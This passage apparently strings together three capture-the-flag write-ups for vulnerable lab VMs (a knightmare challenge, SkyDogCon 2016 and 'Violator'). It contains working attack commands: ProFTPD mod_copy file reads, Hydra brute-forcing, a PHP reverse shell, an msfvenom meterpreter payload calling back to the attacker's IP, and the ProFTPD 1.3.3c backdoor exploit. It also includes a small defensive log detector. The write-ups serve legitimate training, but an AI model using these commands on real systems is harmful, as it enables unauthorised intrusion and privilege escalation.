I was stuck here for quite some time, after much enumeration I took a look for SUID files and came up with a txt file in the /home/proclaimers directory, which was strange.
The file talked about wildcards. Possible privilege escalation?
Some more enumeration turned up a hint in the login.txt file, alluding to a password hidden within an image file. I had already checked out every image though!
Well, in this case knightmare was being literal and the password was right in front of me, in the form of the filename.
Once I switched over to the jkerr user I looked around quite a bit but did not find anything useful. Taking a look at the list of users I decided to Google for who cpgrogan could be.
Based on this Wikipedia article, Clare Grogan was best known as the lead singer of the band ‘Altered Images’. After bouncing my head off the keyboard for some time, once again I had another password.
Once switched over to the cpgrogan user I was able to browse around the home directory and found yet another reference to wild cards.
At this point I needed to gain access as one more user, ‘proclaimers’. There were a few images left and the comment ‘images open doors’ was still burned in my mind, so I pulled them down via Python 3 http.server (which btw I had to use because knightmare removed the Python 2 binary… thanks for that one).
The ‘promisedyouamiracle’ image appeared to have an interesting base64 encoded string in the exif data.
The string decoded to ‘gemini’. C’mon password!
It worked! OK! Now I was in as theproclaimers, what was the next step?
Looking around forever I landed on an interesting shell script, ‘numpties.sh’. The script showed why I had trouble with my PHP reverse shell as well as why I couldn’t use wget to upload anything, haha. It shows us that any file named ‘semaphore’ placed in the /home/proclaimers/letterfromamerica directory would have its ownership changed to root and the SUID bit set. Smells like privilege escalation. I also assumed that the shell script must be running on a cron job.
At this point I needed a simple binary that, once compiled and having the permissions/ownership changed with this cron job, could be leveraged to fire me a root shell.
I compiled it locally and downloaded it using Curl thanks to knightmare’s trolling.
I started up a netcat listener and waited. Not too long after I had a hit and had a root shell! Well, we all know by now that knightmare’s VMs are not over with root and this one was no exception! Onwards to the final flag…and on and on and on. More trolling, I was sweating by this time.
Eventually I got to the bottom of the rabbit hole and found a zip file with what I could only imagine would be a disk image inside.
Of course the zip was password protected and nothing worked. I went back and made a word list from everything I had seen so far. Nada! Eventually, out of sheer desperation, I tried ‘Teuchter’ and immediately wanted to strangle knightmare through the screen.
The zip contained a virtual disk image. I tried to mount it, cut it up with strings and binwalk but nothing worked. Exploring a bit more with my shiny new root privileges gave me another hint within the crontabs file:
Some Googling showed me I could mount the disk image as a new drive and use the vmfs-tools package to explore it. I added the image as a new drive under sda2:
I then used vmfs-fuse to mount the drive and explore it:
root@mrb3n:~/Desktop/teuch# vmfs-fuse /dev/sdb1 /mnt/teuch
root@mrb3n:~/Desktop/teuch# cd /mnt/teuch/
Red Kola? Irn Bru? More hints!
Almost there..Check the ISO and remember password relates to the TV Advert you watched.
I took out the spaces but it’s 25 characters but the Wikipedia page will get it for you.
This was either another troll or knightmare was showing some mercy. From all the hints I was guessing the final flag was hidden inside the glass_ch.jpg image. I could probably pull it out with steghide but I still needed a 25 character password. After going back to the beginning and reviewing everything I had once again I came up with ‘madeinscotlandfromgirders’ as the password.
I copied the image file over to a Windows VM where I had steghide from a previous CTF and FINALLY had the “real” flag after so many “almosts”.
This was an awesome VM, a mixture of entertaining and extremely frustrating. I learned a bunch about Scottish culture and could finally decode some of the things knightmare was saying.
Thanks to knightmare for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.
Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”
Flag#2 – “Obscurity or Security? That is the Question”
Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”
Flag#4 – “A Good Agent is Hard to Find”
Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”
Flag#6 – “Where in the World is Frank?”
Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”
Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”
I always enjoy challenges like this with multiple flags as it helps to keep you going/on path.
I started off with an nmap scan to see what we were dealing with:
root@kali:~# nmap -A -p- -Pn --open -T4 172.16.94.136
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-11-11 09:08 EST
Nmap scan report for 172.16.94.136
Host is up (0.00039s latency).
Not shown: 65531 filtered ports, 1 closed port
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDogCon CTF 2016 - Catch Me If You Can
443/tcp   open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDogCon CTF 2016 - Catch Me If You Can
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after:  2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
22222/tcp open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
|_  256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
MAC Address: 00:0C:29:14:57:58 (VMware)
Device type: general purpose|phone|WAP|specialized|storage-misc
A web server listening on port 80 and 443 as well as an SSH service on a non-standard port.
I went a bit out of order with the flags so the clues do not match up exactly. I checked out the SSH service first and the banner gave up a flag.
root@kali:~# ssh 172.16.94.136 -p 22222
The authenticity of host '[172.16.94.136]:22222 ([172.16.94.136]:22222)' can't be established.
ECDSA key fingerprint is SHA256:DeCMZ74o5wesBHFLyaVY7UTCA7mW+bx6WroHm6AgMqU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[172.16.94.136]:22222' (ECDSA) to the list of known hosts.
###############################################################
# WARNING #
# FBI - Authorized access only! #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
# All actions Will be monitored and recorded #
# Flag{53c82eba31f6d416f331de9162ebe997} #
###############################################################
root@172.16.94.136's password:
The flag was the MD5 of the word ‘encrypt’.
I spun my wheels for a while on the next flag, after running Burp and Dirbuster for a while and not coming up with anything new I decided to go file by file. One of the JavaScript files had an interesting comment, in Hex, which was one of the clues.
Decoding the Hex with Python gave me the next flag, which was the MD5 of ‘nmap’ which must be the hint for the SSH banner flag.
root@kali:~# python
Python 2.7.12+ (default, Sep 1 2016, 20:27:38)
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b37633031333230373061306566373164353432363633653964633166356465657d".decode('hex')
'flag{7c0132070a0ef71d542663e9dc1f5dee}'
>>>
Dirbuster turned up a protected page. Browsing to it gave me an error message. My first thought was changing my user-agent. I first attempted with Burp Intruder and a large user-agent list but did not get any hits.
Digging around for quite some time led me back to the same JavaScript file with some more interesting comments. The FBI page was expecting my UA to be IE 4.0. Super secure!
Changing my UA to IE 4.0 in Burp Repeater got me access to the FBI Portal page.
I set up a match/replace rule in Burp to make it easier to browse the site directly.
The FBI Portal page was all static content, but I did get the next flag (which cracked to ‘evidence’) as well as a clue “new+flag”.
Following the hint brought me to a password protected page.
Basic-auth can be brute-forced with Burp Intruder but I first needed a username. The JavaScript file from earlier gave us a user name and the login prompt states “FBI Personnel” so I followed the username format and configured Intruder to attempt a brute-force with the user ‘carl.hanratty’.
I set up Burp like so:
The username in position 1 with a ‘:’ separate and base64 encoding to properly format the payloads for basic-auth.
I used a large wordlist and eventually got a hit, the 301 redirect indicated a successful login.
I was greeted with an FBI evidence page which gave me my next flag (which cracked to ‘panam’).
As well as a PDF document that did not yield anything upon inspection.
As with all CTFs, I have gotten in the habit of checking images for hidden data with strings, exiftool, steghide, binwalk, etc. Running binwalk against this image file indicated the presence of something embedded. I attempted to carve it up for a while and didn’t get anywhere.
root@kali:~/Desktop/skyconCTF# binwalk -e image.jpg
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
2214320       0x21C9B0        MySQL MISAM compressed data file Version 10
I took a stab with steghide but did not have the passphrase. I eventually had a facepalm moment when trying ‘panam’. I extracted the flag.txt file and had the next flag as well as what appeared to be 2 passwords. But for what? It had to be the SSH service as the rest of the web application appeared static but I did not have user name.
root@kali:~/Desktop/skyconCTF# steghide extract -sf image.jpg -p panam
wrote extracted data to "flag.txt".
root@kali:~/Desktop/skyconCTF# cat flag.txt
flag{d1e5146b171928731385eb7ea38c37b8}=ILoveFrance
clue=iheartbrenda
Google showed that the ‘fastest man alive’ clue was potentially talking about the Flash, also known as Barry Allen. Google further turned up that Barry Allen was an alias used by Frank Abagnale in the movie to trick the FBI agent tracking him. I put together a list of potential usernames based on all the aliases I could find from the movie and tried various formats.
Trying each of this usernames combined with ‘ILoveFrance’ and ‘iheartbrenda’ eventually got me a successful login: barryallen:iheartbrenda. Logging in got me the next flag.
root@kali:~/Desktop/skyconCTF# ssh barryallen@172.16.94.136 -p 22222
###############################################################
# WARNING #
# FBI - Authorized access only! #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
# All actions Will be monitored and recorded #
# Flag{53c82eba31f6d416f331de9162ebe997} #
###############################################################
barryallen@172.16.94.136's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
14 packages can be updated.
7 updates are security updates.
/usr/bin/xauth: file /home/barryallen/.Xauthority does not exist
barryallen@skydogconctf2016:~$
barryallen@skydogconctf2016:~$ ls
flag.txt security-system.data
barryallen@skydogconctf2016:~$ cat flag.txt
flag{bd2f6a1d5242c962a05619c56fa47ba6}
This MD5 cracked to ‘theflash’.
There was also a large zip file in the user’s home directory which I transferred off using SCP to work on locally.
barryallen@skydogconctf2016:~$ file security-system.data
security-system.data:Zip archive data, at least v2.0 to extract
root@kali:~/Desktop/skyconCTF# scp -P 22222 barryallen@172.16.94.136:/home/barryallen/security-system.data /root/Desktop/skyconCTF
###############################################################
# WARNING #
# FBI - Authorized access only! #
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
# All actions Will be monitored and recorded #
# Flag{53c82eba31f6d416f331de9162ebe997} #
###############################################################
barryallen@172.16.94.136's password:
security-system.data 100% 71MB 80.0MB/s 00:00
I unzipped the file and ran it through binwalk (which ended up crashing my VM due to the size), whoops.
The file appeared to be a memory dump. I haven’t done much forensics so I turned to Google and came up with Volatility on Kali which seems to be a go-to for analyzing memory dumps.
I first had to check the image info to figure out the operating system the dump came from and set up a profile moving forward.
root@kali:~/Desktop/skyconCTF# volatility imageinfo -f security-system.data
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/root/Desktop/skyconCTF/security-system.data)
                      PAE type : PAE
                           DTB : 0x33e000L
                          KDBG : 0x80545b60L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-10-10 22:00:50 UTC+0000
     Image local date and time : 2016-10-10 18:00:50 -0400
I next used the ‘files’ plugin and dumped out all the file names.
I grepped for ‘flag.txt’, ‘flag’ and just ‘.txt’ until I got several hits. Code.txt looked particularly promising. Looking at the plugin list I noticed one for checking command line history. Running it got me another Hex string.
Once again I was able to use Python to decode the Hex and grab the last flag.
root@kali:~/Desktop/skyconCTF# python
Python 2.7.12+ (default, Sep 1 2016, 20:27:38)
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b38343164643364623239623066626264383963376235626537363863646338317d".decode('hex')
'flag{841dd3db29b0fbbd89c7b5be768cdc81}'
>>>
Flag 3 kept me stumped, I ran Wireshark and Ettercap for while since it seemed to allude to traffic sniffing, but no luck. I dug around the file system for a while and did not notice any services calling out. Eventually I took a look at the Apache configuration and found flag3 hidden inside the apache.crt file.
I decoded the base64 in Burp which gave me the MD5 of ‘personnel’. Luckily I found that page with Dirbuster or I would have been quite stuck.
This was a fun challenge and I got to play around with forensics tools a bit. I spent quite some time going through the memory dump with Volatility afterwards, really cool stuff.
Thanks to @jamesbower for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.
A while back knightmare asked me to test his boot2root challenge named Violator. Having thoroughly enjoyed his first 3 Droopy, Gibson and Sidney I jumped at the opportunity.
Like his other VMs it had a theme, this one being Depeche Mode themed.
When testing a boot2root I typically approach it as any other challenge, only stopping along the way if I feel I discover a flaw/unintended path, something appears to be broken or I just 100% hit a wall.
Knightmare provided me with the following hints to get going (I’ve also learned by now to set the HDD on all his VMs to non-persistent ) :
Vince Clarke can help you with the Fast Fashion.
The challenge isn’t over with root. The flag is something special.
I have put a few trolls in, but only to sport with you.
Without further ado, here goes:
As always, we start off with a quick nmap scan. This one turns up an FTP service and Apache web server.
root@mrb3n:/# nmap -sV 192.168.110.183
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-09-16 10:13 EDT
Nmap scan report for 192.168.110.183
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:7D:C7:3C (VMware)
Service Info: OS: Unix
The web server is pretty sparse. There is an image of Foghorn Leghorn from Looney Tunes as well as a link to a Wikipedia page about the Depeche Mode album ‘Violator’, which I can only assume is a hint for later.
root@mrb3n:~# curl -s http://192.168.110.183
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
<body>
<br>I Say.. I say... I say boy! You're barkin up the wrong tree!</br>
<img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
<-- https://en.wikipedia.org/wiki/Violator_(album) -->
</body>
</html>
I pulled down the image and checked it with exiftool but did not find any hidden treasures.
Leaving the web server aside and taking a look at the FTP service banner, I find a ProFTPD 1.3.5 File Copy exploit over on exploit-db. Maybe I can use this to pull down something interesting?
I attempt to connect anonymously and get rejected so let’s try out this exploit. If successful, I will be able to use the mod_copy module SITE CPFR/SITE CPTO commands to read/write files remotely and unauthenticated.
root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
I go after /etc/passwd first.
ftp> site CPFR /etc/passwd
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/passwd
250 Copy successful
ftp>
Awesome! The web root is writeable and I was able to grab down a list of usernames.
So here we have a list of local usernames, which happen to be the members of Depeche Mode. I attempted to grab /etc/shadow but was denied. I grabbed the group file to see what permissions each user has on the target system.
ftp> site CPFR /etc/group
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/group
250 Copy successful
root@mrb3n:~/violator# curl -s http://192.168.110.183/group > group
root@mrb3n:~/violator# cat group | grep sudo
sudo:x:27:dg
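The detection side of the mod_copy behaviour shown above, as an added example that is not part of the original post: the log format is a constructed one of my own (timestamp, session id, client, quoted command, three-digit reply code), not ProFTPD’s native log layout, and the sample lines are constructed to mirror the two sessions in this write-up. The first rule flags SITE CPFR/CPTO from a session that has never received a 230 login reply, which is exactly the unauthenticated copy used here; the second flags any SITE CPTO whose destination lies under the web root, since that is how an FTP-side copy becomes reachable over HTTP.

```python
import re
from collections import defaultdict

# Constructed sample log (my own format, not ProFTPD's): one line per command.
SAMPLE_LOG = """\
2016-09-16 13:58:02 s1 192.168.110.179 "USER anonymous" 331
2016-09-16 13:58:03 s1 192.168.110.179 "PASS ****" 530
2016-09-16 13:58:10 s1 192.168.110.179 "SITE CPFR /etc/passwd" 350
2016-09-16 13:58:11 s1 192.168.110.179 "SITE CPTO /var/www/html/passwd" 250
2016-09-16 14:05:40 s2 192.168.110.179 "USER dg" 331
2016-09-16 14:05:41 s2 192.168.110.179 "PASS ****" 230
2016-09-16 14:05:50 s2 192.168.110.179 "SITE CPFR /home/dg/hint" 350
2016-09-16 14:05:51 s2 192.168.110.179 "SITE CPTO /home/dg/hint.bak" 250
2016-09-16 14:06:00 s2 192.168.110.179 "SITE CPTO /var/www/html/violator.php" 250
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) (?P<sess>\S+) (?P<ip>\S+) "(?P<cmd>[^"]*)" (?P<code>\d{3})$'
)
COPY_CMDS = ("SITE CPFR", "SITE CPTO")
WEB_ROOTS = ("/var/www/",)


def parse_log(text):
    """Turn log lines into dicts; lines that do not match the format are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["code"] = int(e["code"])
            events.append(e)
    return events


def detect_mod_copy_abuse(events, web_roots=WEB_ROOTS):
    """Return (timestamp, session, reason, command) for every suspicious copy:
    a CPFR/CPTO before the session authenticated (reply 230), or a CPTO whose
    destination is under the web root."""
    authenticated = defaultdict(bool)  # session id -> has a 230 been seen?
    alerts = []
    for e in events:
        if e["code"] == 230:
            authenticated[e["sess"]] = True
        cmd = e["cmd"]
        if not cmd.upper().startswith(COPY_CMDS):
            continue
        if not authenticated[e["sess"]]:
            alerts.append((e["ts"], e["sess"], "unauthenticated copy command", cmd))
        parts = cmd.split(None, 2)
        target = parts[2] if len(parts) == 3 else ""
        if cmd.upper().startswith("SITE CPTO") and target.startswith(web_roots):
            alerts.append((e["ts"], e["sess"], "copy into web root", cmd))
    return alerts


if __name__ == "__main__":
    for alert in detect_mod_copy_abuse(parse_log(SAMPLE_LOG)):
        print(*alert)
```

On the sample, session s1 produces three alerts (the unauthenticated CPFR, the unauthenticated CPTO, and the CPTO into /var/www/html) and the authenticated dg session still produces one for the copy into the web root; the authenticated copy within the home directory is left alone.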
The user dg is in the sudo group, so hopefully we can get his creds somehow! At this point I figured I needed some sort of wordlist. The Wikipedia page referenced in the index page source seems like a good candidate, so I fired up CeWL and put together a quick wordlist.
This wordlist didn’t get me anywhere. After some fumbling around with various combinations I settled on a wordlist of all of the song titles, lowercase, without spaces or special characters. First we remove all spaces.
root@mrb3n:~/violator# sed 's/ //g' violator > violator_nospaces
We can clean things up a bit more with cut and tr.
Interestingly enough, Hydra finds valid passwords for all 4 users. dg is my target so let’s check his account first.
root@mrb3n:~/violator# hydra -L users -P violator_list ftp://192.168.110.183
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-16 14:00:35
[DATA] max 16 tasks per 1 server, overall 64 tasks, 96 login tries (l:4/p:24), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.110.183   login: dg   password: policyoftruth
[21][ftp] host: 192.168.110.183   login: mg   password: bluedress
[21][ftp] host: 192.168.110.183   login: af   password: enjoythesilence
[21][ftp] host: 192.168.110.183   login: aw   password: sweetestperfection
1 of 1 target successfully completed, 4 valid passwords found
Logging in I am in dg’s home directory and am able to change to various other directories, including those for our other 3 users.
root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/dg" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x  10 root root 4096 Jun  6 20:31 bd
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 af   af   4096 Jun 12 09:25 af
drwxr-xr-x   2 aw   aw   4096 Jun 12 09:25 aw
drwxr-xr-x   4 dg   dg   4096 Jun 14 18:55 dg
drwxr-xr-x   2 mg   mg   4096 Jun 12 09:28 mg
226 Transfer complete
I pull down various files for inspection locally.
ftp> get minarke-1.21.tar.bz2
local: minarke-1.21.tar.bz2 remote: minarke-1.21.tar.bz2
200 PORT command successful
150 Opening BINARY mode data connection for minarke-1.21.tar.bz2 (15576 bytes)
226 Transfer complete
15576 bytes received in 0.01 secs (2.7953 MB/s)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 aw   aw    59 Jun 12 09:19 hint
226 Transfer complete
ftp> get hint
local: hint remote: hint
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 mg   mg   112 Jun 12 09:28 faith_and_devotion
226 Transfer complete
ftp> get faith_and_devotion
local: faith_and_devotion remote: faith_and_devotion
200 PORT command successful
150 Opening BINARY mode data connection for faith_and_devotion (112 bytes)
226 Transfer complete
Dg’s home directory contains a more extensive directory listing which we’ll have to come back to later.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root root 4096 Jun  6 20:31 bin
drwxr-xr-x   2 root root 4096 Jun  6 20:46 etc
drwxr-xr-x   3 root root 4096 Jun  6 20:31 include
drwxr-xr-x   4 root root 4096 Jun  6 20:31 lib
drwxr-xr-x   2 root root 4096 Jun  6 20:31 libexec
drwxr-xr-x   2 root root 4096 Jun  6 20:31 sbin
drwxr-xr-x   4 root root 4096 Jun  6 20:31 share
drwxr-xr-x   2 root root 4096 Jun  6 22:17 var
Taking a look at our loot, the hint file is a bit vague…for now…
root@mrb3n:~/violator# cat hint
You are getting close... Can you crack the final enigma..?
The Minarke archive is interesting: a C file and makefile for compiling an Enigma M4 emulator. We know that knightmare is infamous for flag challenges, so I am almost certain this will come into play later.
root@mrb3n:~/violator/minarke-1.21# cat minarke.c
/* Minarke, an Enigma M4 emulator
 *
 * Written by John Gilbert
 * Version 1.21
 * (c) 2008
I compile it and check out the binary. Our suspicions are confirmed: this can be used to crack some Enigma code. Pretty awesome. Now let’s find that code!
root@mrb3n:~/violator/minarke-1.21# make
gcc -g -Wall -o minarke minarke.c
root@mrb3n:~/violator/minarke-1.21# ./minarke
Minarke, an Enigma M4 emulator
by John Gilbert
Emulates the Kriegsmarine M4 Enigma encryption machine
Initial Setup Notes
Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them)
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hit return to end input, 11 pairs recomended for maximum security.
Hit ESC at any time to quit.
Special Keys (during input mode)
1: rewind one setting
2: reset position settings
3: new position settings
4: new setup
9: toggle debug
0: show position settings
?: show help
see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.html
Rotors:
The faith_and_devotion file contains what we need to use the Enigma machine once we have the code.
root@mrb3n:~/violator# cat faith_and_devotion
Lyrics:
* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D
Now I need a shell. Since /var/www/html appears to be writeable, I attempt to upload a PHP reverse shell. If all goes well and knightmare doesn’t have any tricks up his sleeve I should be able to grab a nice reverse shell.
root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www/html
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg      dg      51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd nogroup   699 Sep 16 17:39 group
-rw-rw-r--   1 dg      dg        318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd nogroup  1330 Sep 16 15:24 passwd
226 Transfer complete
ftp> put /var/www/html/violator.php
local: /var/www/html/violator.php remote: /var/www/html/violator.php
200 PORT command successful
150 Opening BINARY mode data connection for /var/www/html/violator.php
226 Transfer complete
3463 bytes sent in 0.00 secs (33.0257 MB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg      dg      51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd nogroup   699 Sep 16 17:39 group
-rw-rw-r--   1 dg      dg        318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd nogroup  1330 Sep 16 15:24 passwd
-rw-r--r--   1 dg      dg       3463 Sep 16 18:18 violator.php
226 Transfer complete
I browse to my violator.php reverse shell script and sure enough get a connection as www-data.
root@mrb3n:~/violator# curl -s http://192.168.110.183/violator.php

root@mrb3n:~# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.110.179] from (UNKNOWN) [192.168.110.183] 33641
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 19:20:09 up  3:00,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$
I su to the dg user and check what he is able to run as root, since I remembered from earlier that he is part of the sudoers group. Interesting, he can run another version of proftpd as root, which is what we saw earlier in his home directory.
www-data@violator:/$ su dg
su dg
Password: policyoftruth
dg@violator:/$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
We now have another service running locally on port 2121. How can this be abused to gain root privs?
dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -
tcp        0    218 192.168.110.183:33641   192.168.110.179:443     ESTABLISHED 1391/bash
tcp6       0      0 :::21                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 192.168.110.183:80      192.168.110.179:56414   ESTABLISHED -
tcp6       0      0 192.168.110.183:21      192.168.110.179:56886   ESTABLISHED -
Connecting to port 2121 locally, I see we are dealing with ProFTPD 1.3.3c.
dg@violator:~/bd/sbin$ telnet 127.0.0.1 2121
telnet 127.0.0.1 2121
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (DepecheModeViolatorServer) [127.0.0.1]
This particular ProFTPD version has a known backdoor command execution vulnerability which hopefully we can use to escalate privileges. There are many ways to do this; the way I did it worked, but of course there are other options.
It looks like I will need Metasploit to take advantage of this exploit so I quickly create a meterpreter PHP payload and upload it to the target, execute and grab a meterpreter shell.
root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php
I could have used FTP to transfer the file, but after seeing that knightmare was kind enough to remove curl and wget I had to find another way.
Connection closed by foreign host.
dg@violator:~/bd/sbin$ wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php
wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php
The program 'wget' is currently not installed. You can install it by typing:
sudo apt-get install wget
dg@violator:~/bd/sbin$ curl -O http://192.168.110.179/violator_meterp.php
curl -O http://192.168.110.179/violator_meterp.php
The program 'curl' is currently not installed. You can install it by typing:
sudo apt-get install curl
SCP was still installed so I was able to transfer the file that way, as root which is super secure!
Executing the shell, I gain a connection and it's time to set up some port forwarding so I can attack remote port 2121 directly.
dg@violator:/var/www/html$ php violator_meterp.php

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.110.179:8443
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.110.179:8443 -> 192.168.110.183:35213) at 2016-09-16 14:50:38 -0400
I use the built-in meterpreter portfwd command to set up the tcp relay.
msf exploit(proftpd_133c_backdoor) > exploit
[*] Started reverse TCP handler on 192.168.110.179:4444
[*] Sending Backdoor Command
[*] Command shell session 6 opened (192.168.110.179:4444 -> 192.168.110.183:44484) at 2016-09-16 15:59:57 -0400

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/#
Checking for our flag, as I expected, it was a troll.
root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?
--- Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
The hidden directory ‘basildon’ in the root directory contains a file, crocs.rar.
root@violator:/root# ls -lah
ls -lah
total 24K
drwx------  3 root root 4.0K Jun 14 19:56 .
drwxr-xr-x 22 root root 4.0K Jun 14 19:44 ..
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
d--x------  2 root root 4.0K Jun 14 19:57 .basildon
-rw-r--r--  1 root root  114 Jun 12 10:22 flag.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@violator:/root# cd .basildon
cd .basildon
root@violator:/root/.basildon# ls -lah
ls -lah
total 148K
d--x------  2 root root 4.0K Jun 14 19:57 .
drwx------  3 root root 4.0K Jun 14 19:56 ..
-rw-r--r--  1 root root 138K Jun 12 14:46 crocs.rar
I move the file over to the web root and pull it down locally for analysis.
